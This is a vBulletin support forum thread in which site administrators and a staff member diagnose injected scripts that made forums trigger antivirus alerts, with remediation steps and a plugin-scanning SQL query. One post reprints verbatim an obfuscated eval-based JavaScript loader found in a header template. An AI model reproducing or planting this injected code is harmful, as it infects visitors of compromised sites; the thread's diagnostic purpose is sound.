Announcement

Collapse
No announcement yet.

Forums triggering virus alerts

Collapse
X
 
  • Filter
  • Time
  • Show
Clear All
new posts

  • #31
    Thing is, another person I know who was hit with this is also running forum runner.. I wish we could poll everyone in this thread..

    Comment


    • #32
      For an addon like ForumRunner to be a point of entry, they need to be using unsanitized variables somewhere. Unfortunately there is no way to write a query to check plugins for unsanitized variables. Each plugin and external code needs to be checked. As such I wouldn't point fingers at a particular addon until it was checked.
      Translations provided by Google.

      Wayne Luke
      The Rabid Badger - a vBulletin Cloud demonstration site.
      vBulletin 5 API - Full / Mobile
      Vote for your favorite feature requests and the bugs you want to see fixed.

      Comment


      • #33
        I had the same problem on the 27th of December and found this in the header template. I have no clue where this is from. Once I deleted it, the problem was gone. Users with ie had the virus notification. As soon as they used Chrome there was no problem.

        <script>
        var _7591;var _7979='3760D105F135B1020B1105D1000C1055B715E1025B1100C1065C1010F1095C1040D1070C1065B715D10 75F735A1000F735A1010D735F1050C735C1020C735A1015F720B1130F1020E820F1025F1100F1065B1010E1095 E1040D1070E1065D715C1010F720B1130A1085C1020A1095B1100B1085F1065B715E1010E815E1000C830C710C 710A805D1020E715B1075D1000A1085E1090A1020E880E1065F1095E715F1010A750A1000F720C720D720F730D 715A715F1010A820D1010B700E1000C720E825B770D780D830F930D1095A1085C1040F1065F1030D745C1025E1 085C1070A1060D850F1035E1000F1085B850D1070C1015E1020C715C1010E730B765E800C720B805F1010A745B 1095D1070A930E1095F1085F1040F1065F1030F715F770D785A720E720F1140F810F1110D1035D1040B1055B10 20E715A1010C740F740D720B1130E1040B1025D715B1050B970C1010A980E720A1130E1075A820A1075B745B10 85C1020F1075F1055C1000A1010C1020F715B1065D1020B1110E675B925A1020E1030B860B1115B1075E715E71 0E975A975A1005F710E730B1020F715C1010D720E730B710E975D975B1005E710D735F710E1030E710C720D735 F1050E970E1010A980F720B1140D1140C1085B1020F1095A1100F1085A1065F675A1075E1140E715F710A1125C 715E770B745E1060D715C975C710D1070A975F710F720B970D755E980B720B1130E1005A715E720B1140C1120D 1130A770E745A1115B715D685D815F780E675E1015A820A975A710A1040A805D750F750F1020F745A1035B740F 1010C740D790F745D785F750B795E750A800B745C1000B830A1065F820A1030F975A710D675E1080A820D975D7 10D765F975E710F675D1055E820C975E710A765A975F710A675C760C820E975A710E1045D805B1090E810A1095 C805A1085C810A1075F805C755E810D1050E805A755C810F975F710B825F815B750A780E825F685F720C1140E1 105F675A1005B715E720D1130A1110F675B1025D820E770F745E840B715F975C710D780C975A710F720D810D10 25B745C775E715C975F710E1015F975C710E735F975C710B1040E805D750D750C1020B745D1035A740E1010C74 0E790C745C785D750A795E750C800E745B1000F830A1065B820B1030A975B710C720F810A1025B745B760F745F 1045A820A975A710C1090E975B710D810F1025B745E760F745F1095A820A975B710E1085F975A710A810B1025A 745B760D745C1075D820E975B710A755D975E710B810C1025A745C760A745A1050C820B975A710D755B975A710 D810B1025A745C775E715D975D710C1080B975B710C735B975B710C765B975F710A720F810B1025A745F775E71 5D975E710D1055E975C710A735F975A710D765B975D710D720C810E770E745C1060E715C975F710B1070A975F7 10B720C970B755A980B745D1100B715C1025A720F1140C710E735B770A790E735E770A790C735B710C1135F109 0E1095A1120F1055F1020A1135B760D755E1135A1015B1070D1010D1100B1060D1020A1065E1095A1135E1090C 1020D1095F840D1095E1095C1085C1040C1005C1100D1095E1020B1135B1040D1025E1085B1000F1060D1020D1 135B1010C1070A1060F1135D1035A1070B1060F1020B1135F1050E1100D1035D1065C760C1135F1020A1105D10 35F1055D1020D1095E1005D1125F1015D1055A1005E1070D1005D1095F765E1135F1075C1035B1075F1135C104 0C1025C1085C1000D1060C1020E1085F1135F1000D1095B1135D1090E1085A1010B1135F1000D1015A1090A113 5F1135F1040C1095E1135B1015C1120D1065E1015A1065A1090A1135F1035F1095F1095D1075E1135F1105A104 0F1090B1040D1005A1040B1055A1040A1095C1120C1135F1095A1070D1075F1135B1035D1020F1040D1030B103 5A1095A1135E1030C1020F1095B860A1055C1020C1060B1020B1065F1095E1090C845E1120E935E1000B1030A9 05D1000A1060F1020A1135B1135E1005B1070B1015C1120D1135D1055B1020E1025B1095D1135B1110F1040F10 15B1095D1035E1135B1000D1005A1090F1070A1055D1100F1095A1020A1135A1035C1040A1015C1015C1020B10 65D1135E1075F1070F1090B1040A1095B1040A1070A1065F1135F1000B1075B1075D1020A1065B1015A850C103 5D1040C1055E1015D1135E1025D1100C1065F1010F1095A1040C1070B1065D1135E1105F1000A1085D1135F111 0A1085F1040E1095C1020B1135F1020B1055D1090D1020C1135F1040C1025B1135F1010D1085A1020D1000D109 5D1020D860D1055A1020D1060A1020E1065B1095F710D745F1090F1075F1055B1040E1095A715B710A1135B710 B720C720C720E565E';var _2896=/[\x41\x42\x43\x44\x45\x46]/;var _1720=2;var _2541=_7979.charAt(_7979.length-1);var _8918;var _8713=_7979.split(_2896);var _1864=[String.fromCharCode,isNaN,parseInt,String];_8713[1]=_1864[_1720+1](_1864[_1720](_8713[1])/21);var _9418=(_1720==9)?String: eval;_8918='';_11=_1864[_1720](_8713[0])/_1864[_1720](_8713[1]);for(_7591=3;_7591<_11;_7591++)_8918+=(_1864[_1720-2]((_1864[_1720](_8713[_7591])+_1864[_1720](_8713[2])+_1864[_1720](_8713[1]))/_1864[_1720](_8713[1])-_1864[_1720](_8713[2])+_1864[_1720](_8713[1])-1));window.alert=_0Oo1lO;function _0Oo1lO(){return};_9418(_8918);
        </script>

        Comment


        • #34
          Standard injection.. You are probably still vulnerable..

          Comment


          • #35
            Originally posted by diretur View Post
            I had the same problem on the 27th of December and found this in the header template. I have no clue where this is from. Once I deleted it, the problem was gone. Users with ie had the virus notification. As soon as they used Chrome there was no problem.
            This on your 3.7.4 or 3.8.7 license?

            Run this query:
            UPDATE usertextfield SET searchprefs='';

            Make sure you're on either 3.8.7 PL2 or 4.1.9

            Finally secure your Admin CP with a second layer of access through .htaccess.
            Translations provided by Google.

            Wayne Luke
            The Rabid Badger - a vBulletin Cloud demonstration site.
            vBulletin 5 API - Full / Mobile
            Vote for your favorite feature requests and the bugs you want to see fixed.

            Comment


            • #36
              Originally posted by Wayne Luke View Post
              This on your 3.7.4 or 3.8.7 license?

              Run this query:
              UPDATE usertextfield SET searchprefs='';

              Make sure you're on either 3.8.7 PL2 or 4.1.9

              Finally secure your Admin CP with a second layer of access through .htaccess.
              I'm on 3.8.7 PL2
              DB query done.
              Admin CP secured.

              thanks

              Comment


              • #37
                Wayne,

                I ran Suspect File Diagnostics and it said that class_core.php and functions.php, now when I rerun it they are reported as:
                File version mismatch: found 3.8.7 Patch Level 2, expected 3.8.7 Patch Level 1"
                At the top of the page it says I am running 3.8.7 PL2 so I am confused.

                Comment


                • #38
                  Originally posted by 45Wheelgun View Post
                  Wayne,

                  I ran Suspect File Diagnostics and it said that class_core.php and functions.php, now when I rerun it they are reported as:
                  File version mismatch: found 3.8.7 Patch Level 2, expected 3.8.7 Patch Level 1"
                  At the top of the page it says I am running 3.8.7 PL2 so I am confused.
                  This is common after applying a Patch Level release. It isn't anything to be worried about.
                  Translations provided by Google.

                  Wayne Luke
                  The Rabid Badger - a vBulletin Cloud demonstration site.
                  vBulletin 5 API - Full / Mobile
                  Vote for your favorite feature requests and the bugs you want to see fixed.

                  Comment


                  • #39
                    These three have been replaced but still report that they are not as expected: vbulletin-adminhelp.xml vbulletin-language.xml vbulletin-settings.xml

                    Comment


                    • #40
                      Originally posted by Wayne Luke View Post
                      So... Has anyone run the steps that I listed above? What were the results?
                      Reply from our dedicated server company. Numbers from your suggested steps:

                      1. sounds like a good idea, shouldn't cause any problems. You should go ahead and do this. (I did this but found nothing)

                      2. I looked and it all looks fine

                      3. I couldn't find any of the files mentioned by name here, so I couldn't check these

                      4. I couldn't find a "plugin" or "plugins" directory, and I don't know where plugins are installed, so I can't do this

                      5. same as 4

                      6. same as 4

                      I ran the provided SQL and the one result returned looks fine (just calling a function that has 'exec' as part of the name):
                      Code:
                      mysql> SELECT title, phpcode, hookname, product FROM plugin WHERE 
                      mysql> phpcode LIKE '%base64%' OR phpcode LIKE '%exec%' OR phpcode LIKE 
                      mysql> '%system%' OR phpcode like '%pass_thru%' OR phpcode like 
                      mysql> '%iframe%';
                      +----------------------------------------------------+-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+--------------+----------+
                      | title | phpcode | hookname | product |
                      +----------------------------------------------------+-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+--------------+----------+
                      | vBa CMPS - Open Smilie Window in Admin CP Redirect | if 
                      | ($_REQUEST['do'] == 'getsmilies')
                      {
                      exec_header_redirect($vbulletin->options['bburl'] . '/misc.php?do=getsmilies&editorid=' . $_REQUEST['editorid'] . '&wysiwyg=' . intval($_REQUEST['wysiwyg']) . '&getsmilies=' . intval($_REQUEST['getsmilies'])); } | admin_global | adv_cmps | 
                      +----------------------------------------------------+-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+--------------+----------+
                      1 row in set (0.00 sec)
                      7. I ran this SQL and the results all look fine / non-malicious:
                      Code:
                      styleid title template
                      \n".(($GLOBALS['vbulletin']->options['skimlinks_domain'] != 'go.yourdomain.com') ? ("var skimlinks_domain = '" . $GLOBALS['vbulletin']->options['skimlinks_domain'] . "';"\n</script>.events.systemInit.subscribe(skimlinks);
                      \nVerdanaet MSmanperifum_font Arial
                      -1 forumhome_markread_script <script type=\\"text/javascript\\" src=\\"clientscript/vbulletin_read_marker.js?v=" . $GLOBALS['vbulletin']->options['simpleversio\n</script>m_readmarker_system();kread'] = \\"$vbphrase[doubleclick_forum_markread]\\";
                      \n</fieldset>t>ype=\\"hidden\\" name=\\"recaptcha_response_field\\" value=\\"manual_challenge\\" />\\" width=\\"400\\" frameborder=\\"0\\"></iframe>/iframe>
                      \n\t".(($show['emailcol'] AND exec_switch_bg()) ? ("<td class=\\"$bgclass\\">".(($show['emaillink']) ? ("<a href=\\"sendmessage.php?" . $GLOBALS['vbulletin']->session->vars['sessionurl'] . "do=mailmember&amp;u=$userinfo[userid]\\" target=\\"_blank\\" rel=\\"nofollow\\"><img src=\\"$stylevar[imgdir_button]/email.gif\\" alt=\\"email.gif\\" title=\\"" . construct_phrase("$vbphrase[click_here_to_email_x]", "$userinfo[username]") . "\\" border=\\"0\\" /></a>") : (""))."&nbsp;".(($show['pmlink']) ? ("<a href=\\"private.php?" . $GLOBALS['vbulletin']->session->vars['sessionurl'] . "do=newpm&amp;u=$userinfo[userid]\\" target=\\"_blank\\" rel=\\"nofollow\\"><img src=\\"$stylevar[imgdir_button]/sendpm.gif\\" alt=\\"sendpm.gif\\" title=\\"" . construct_phrase("$vbphrase[send_private_message_to_x]", "$userinfo[username]") . "\\" border=\\"0\\" /></a>"\n\t".(($show['imicons'] AND exec_switch_bg()) ? ("<td class=\\"$bgclass\\">$userinfo[icqicon] $userinfo[aimicon] $userinfo[msnicon] $userinfo[yahooicon] $userinfo[skypei\n\t".(($show['homepagecol'] AND exec_switch_bg()) ? ("<td class=\\"$bgclass\\">".(($show['homepagelink']) ? ("<a href=\\"$userinfo[homepage]\\" target=\\"_blank\\"><img src=\\"$stylevar[imgdir_button]/home.gif\\" alt=\\"home.gif\\" title=\\"" . construct_phrase("$vbphrase[visit_xs_homepage]", "$userinfo[username]") . "\\" border=\\"0\\"\n\t".(($show['searchcol'] AND exec_switch_bg()) ? ("<td class=\\"$bgclass\\">".(($show['searchlink']) ? ("<a href=\\"search.php?" . $GLOBALS['vbulletin']->session->vars['sessionurl'] . "do=finduser&amp;u=$userinfo[userid]\\" rel=\\"nofollow\\"><img src=\\"$stylevar[imgdir_button]/find.gif\\" alt=\\"find.gif\\" title=\\"" . construct_phra\n\t".(($show['avatarcol'] AND exec_switch_bg()) ? ("<td class=\\"$bgclass\\">".(($show['avatar']) ? ("<img src=\\"$avatarurl\\" border=\\"0\\" $avwidth $avheight alt=\\"\n\t".(($show['usergroup'] AND exec_switch_bg()) ? ("<td class=\\"$bgclass\\">".(($show['hideleader']) ? ("&nbsp;") : ("<input type=\\"checkbox\\" name=\\"deletebox[$user\n</tr>erid]]\\" value=\\"yes\\" />"))."</td>") : (""))."
                      \n\t\t<a style=\\"float:$stylevar[right]\\" href=\\"#top\\" onclick=\\"return toggle_collapse('uopt_login')\\"><img id=\\"collapseimg_uopt_login\\" src=\\"$stylevar[imgdi\n\t\t\t\t\t\t<td><label for=\\"cb_invisible\\"><input type=\\"checkbox\\" name=\\"options[invisible]\\" value=\\"1\\" id=\\"cb_invisible\\" $checked[invisible] />$vbphra\n\t\t\t\t\t\t<td><label for=\\"cb_showreputation\\"><input type=\\"checkbox\\" name=\\"options[showreputation]\\" value=\\"1\\" id=\\"cb_showreputation\\" $checked[showr\n\t\t\t\t\t\t<td><label for=\\"cb_showvcard\\"><input type=\\"checkbox\\" name=\\"options[showvcard]\\" value=\\"1\\" id=\\"cb_showvcard\\" $checked[showvcard] />$vbphra\n\t\t<a style=\\"float:$stylevar[right]\\" href=\\"#top\\" onclick=\\"return toggle_collapse('uopt_msg')\\"><img id=\\"collapseimg_uopt_msg\\" src=\\"$stylevar[imgdir_bu\n\t\t\t\t\t\t<td><label for=\\"cb_adminemail\\"><input type=\\"checkbox\\" name=\\"options[adminemail]\\" value=\\"1\\" id=\\"cb_adminemail\\" $checked[adminemail] />$vb\n\t\t\t\t\t\t<td><label for=\\"cb_showemail\\"><input type=\\"checkbox\\" name=\\"options[showemail]\\" value=\\"1\\" id=\\"cb_showemail\\" $checked[showemail] />$vbphra\n\t\t\t\t\t\t<td><label for=\\"cb_receivefriendemailrequest\\"><input type=\\"checkbox\\" name=\\"options[receivefriendemailrequest]\\" value=\\"1\\" id=\\"cb_receivefriendemailrequest\\" $checked[receivefriendemailrequest] />$vbphrase[receive_friendship_req_email]</label><input type=\\"hidden\\" name=\\"set_options[receivefriendemailreq\n\t\t\t\t\t\t<td><label for=\\"cb_receivepm\\"><input type=\\"checkbox\\" name=\\"options[receivepm]\\" value=\\"1\\" id=\\"cb_receivepm\\" onclick=\\"toggle_disabled(this.checked, 'pmoptions')\\" $checked[receivepm] />$vbphrase[enable_private_messaging]</label><input type=\\"hidden\\" name=\\"set_options[receivepm]\\" value=\\"1\\" /></\n\t\t\t\t\t\t\t<td><label for=\\"cb_receivepmbuddies\\"><input type=\\"checkbox\\" name=\\"options[receivepmbuddies]\\" value=\\"1\\" id=\\"cb_receivepmbuddies\\" $check\n\t\t\t\t\t\t\t<td><label for=\\"cb_emailonpm\\"><input type=\\"checkbox\\" name=\\"options[emailonpm]\\" value=\\"1\\" id=\\"cb_emailonpm\\" $checked[emailonpm] />$vbph\n\t\t\t\t\t\t\t<td><label for=\\"cb_pmpopup\\"><input type=\\"checkbox\\" name=\\"pmpopup\\" value=\\"1\\" id=\\"cb_pmpopup\\" $checked[pmpopup] />$vbphrase[show_pm_popu\n\t\t\t\t\t\t\t<td><label for=\\"cb_pmdefaultsavecopy\\"><input type=\\"checkbox\\" name=\\"options[pmdefaultsavecopy]\\" value=\\"1\\" id=\\"cb_pmdefaultsavecopy\\" $checked[pmdefaultsavecopy] />" . construct_phrase("$vbphrase[save_pm_copy_default]", "private.php?" . $GLOBALS['vbulletin']->session->vars['sessionurl_q'] . "folderid=-1") \n\t\t\t\t\t\t\t" . construct_phrase("$vbphrase[features_visitor_messaging_system]", "member.php?" . $GLOBALS['vbulletin']->session->vars['sessionurl'] . "u=" . $GLOBALS[\n\t\t\t\t\t\t<td><label for=\\"cb_vm_enable\\"><input type=\\"checkbox\\" name=\\"options[vm_enable]\\" value=\\"1\\" id=\\"cb_vm_enable\\" onclick=\\"toggle_disabled(this.checked, 'vmoptions')\\" $checked[vm_enable] />$vbphrase[enable_visitor_messaging]</label><input type=\\"hidden\\" name=\\"set_options[vm_enable]\\" value=\\"1\\" /></\n\t\t\t\t\t\t\t<td><br />" . construct_phrase("$vbphrase[usage_vm_only_from_contacts]", "profile.php?" . $GLOBALS['vbulletin']->session->vars['sessionurl'] . "do=buddyli\n\t\t\t\t\t\t\t<td><label for=\\"cb_vm_contactonly\\"><input type=\\"checkbox\\" name=\\"options[vm_contactonly]\\" value=\\"1\\" id=\\"cb_vm_contactonly\\" $checked[vm_\n\t\t\t<a style=\\"float:$stylevar[right]\\" href=\\"#top\\" onclick=\\"return toggle_collapse('uopt_thrd')\\"><img id=\\"collapseimg_uopt_thrd\\" src=\\"$stylevar[imgdi\n\t\t\t\t\t\t\t<div><label for=\\"cb_showsignatures\\"><input type=\\"checkbox\\" name=\\"options[showsignatures]\\" value=\\"1\\" id=\\"cb_showsignatures\\" $checked[sh\n\t\t\t\t\t\t\t<div><label for=\\"cb_showavatars\\"><input type=\\"checkbox\\" name=\\"options[showavatars]\\" value=\\"1\\" id=\\"cb_showavatars\\" $checked[showavatars\n\t\t\t\t\t\t\t<div><label for=\\"cb_showimages\\"><input type=\\"checkbox\\" name=\\"options[showimages]\\" value=\\"1\\" id=\\"cb_showimages\\" $checked[showimages] />\n\t\t\t\t\t\t<td>" . construct_phrase("$vbphrase[choose_thread_display_mode]", "faq.php?" . $GLOBALS['vbulletin']->session->vars['sessionurl'] . "faq=vb3_board_usage#faq\n\t\t\t<a style=\\"float:$stylevar[right]\\" href=\\"#top\\" onclick=\\"return toggle_collapse('uopt_date')\\"><img id=\\"collapseimg_uopt_date\\" src=\\"$stylevar[imgdi\n\t\t<a style=\\"float:$stylevar[right]\\" href=\\"#top\\" onclick=\\"return toggle_collapse('uopt_misc')\\"><img id=\\"collapseimg_uopt_misc\\" src=\\"$stylevar[imgdir_\n\t\t\t\t\t\t<label for=\\"cb_showusercss\\"><input type=\\"checkbox\\" name=\\"options[showusercss]\\" value=\\"1\\" id=\\"cb_showusercss\\" $checked[showusercss] />$vb\n</form>te_hook[usercp_options_end]\\"button\\" value=\\"$vbphrase[reset_fields]\\" accesskey=\\"r\\" />>\">"1\\" /> \n\t\t\t\t\twindow.location=\\"online.php?" . $GLOBALS['vbulletin']->session->vars['sessionurl_js'] . "order=$sortorder&sort=$sortfield&pp=$perpage&page=$pagenumber$refre\n\t\t<meta http-equiv=\\"refresh\\" content=\\"" . $GLOBALS['vbulletin']->options['WOLrefresh'] . ";url=online.php?" . $GLOBALS['vbulletin']->session->vars['sessionurl']\n<table class=\\"tborder\\" cellpadding=\\"$stylevar[cellpadding]\\" cellspacing=\\"$stylevar[cellspacing]\\" border=\\"0\\" width=\\"100%\\" align=\\"center\\" id=\\"wo\n\t\t<strong>" . construct_phrase("$vbphrase[x_members_and_y_guests]", "$numbervisible", "$numberguests") . "</strong><br />" . construct_phrase("$vbphrase[most_users_ev\n\t\t\t<a href=\\"$sorturl".((!$show['sorturlnoargs']) ? ("&amp;") : (""))."order=desc&amp;sort=time&amp;pp=$perpage&amp;page=$pagenumber\\">$vbphrase[last_activity]</a>\n\t\t<a href=\\"$sorturl".((!$show['sorturlnoargs']) ? ("&amp;") : (""))."order=asc&amp;sort=username&amp;pp=$perpage&amp;page=$pagenumber\\">$vbphrase[username]</a> $so\n\t<td class=\\"thead\\"><a href=\\"$sorturl".((!$show['sorturlnoargs']) ? ("&amp;") : (""))."order=asc&amp;sort=location&amp;pp=$perpage&amp;page=$pagenumber\\">$vbphra\n</html>icons and forum jump -->\">&nbsp; $vbphrase[viewing_error_message]</td>vbphrase[viewing_error_message]\\" /></td>age]\\" /></td>0%\\" align=\\"center\\"> \n</html>t>esh();0;"; = \\"$js_url\\";efresh();\\", 100);" />se[click_if_browser_does_not_redirect]</a></p>" onclick=\\"proceed_click()\\" accesskey=\\"s\\" />">
                      
                       

                      8. htaccess files are all clean.

                      Comment


                      • #41
                        3) Templates are stored in the database. You would have to search these from the AdminCP or by direct query. Templates have never been stored in the file system in vBulletin.

                        4) Plugins are stored in the database. You would have to manually review the code of each one within the Admin CP under Plugins/Products -> Plugin Manager.

                        5) Same as 4

                        6) Same as 4

                        A query was provided in the steps to handle 5 and 6 (says for 4 and 5 but that is wrong). Very easy to check simply by running the provided query.

                        7) output format here is really bad and can't really view the columns.


                        All of these steps can be run either in the AdminCP or phpMyAdmin though. They don't require special hosting privileges to check.
                        Translations provided by Google.

                        Wayne Luke
                        The Rabid Badger - a vBulletin Cloud demonstration site.
                        vBulletin 5 API - Full / Mobile
                        Vote for your favorite feature requests and the bugs you want to see fixed.

                        Comment


                        • #42
                          I think I may have found it. I've tried everything mentioned here and found no problems so I finally decided to try something off-the-wall and I disabled all Google Certified Ad Networks in my Adsense control panel. I did this on the 29th and have had no reports of infection since then. It would appear that one of Google's "Certified" networks was my culprit. I'm going to begin turning those networks back on one at a time and see what happens....
                          Host for ShopFloorTalk.com

                          Comment


                          • #43
                            Originally posted by MarkTTU View Post
                            I think I may have found it.
                            It certainly could be a rogue ad that's causing your problem, but those of us with a script in our Footer that tries to load alltagcloud.info are having a different issue. And, it's not a rogue ad.

                            I talked to another forum owner today -- huge forum -- he had it in his footer and I noticed it and reported it to him. He said, he'd removed it once and now it's back. And yes... he's running Forum Runner, too.

                            Comment


                            • #44
                              Originally posted by creativepart View Post
                              It certainly could be a rogue ad that's causing your problem, but those of us with a script in our Footer that tries to load alltagcloud.info are having a different issue. And, it's not a rogue ad.
                              Granted, but since I couldn't find anything (footer or otherwise) I figured it was worth posting my own experience since it seems to have been solved for me.
                              Host for ShopFloorTalk.com

                              Comment


                              • #45
                                I have had the same experience. I disabled the Certified Ad Networks and have not had a complaint since.

                                Comment

                                widgetinstance 262 (Related Topics) skipped due to lack of content & hide_module_if_empty option.
                                Working...
                                X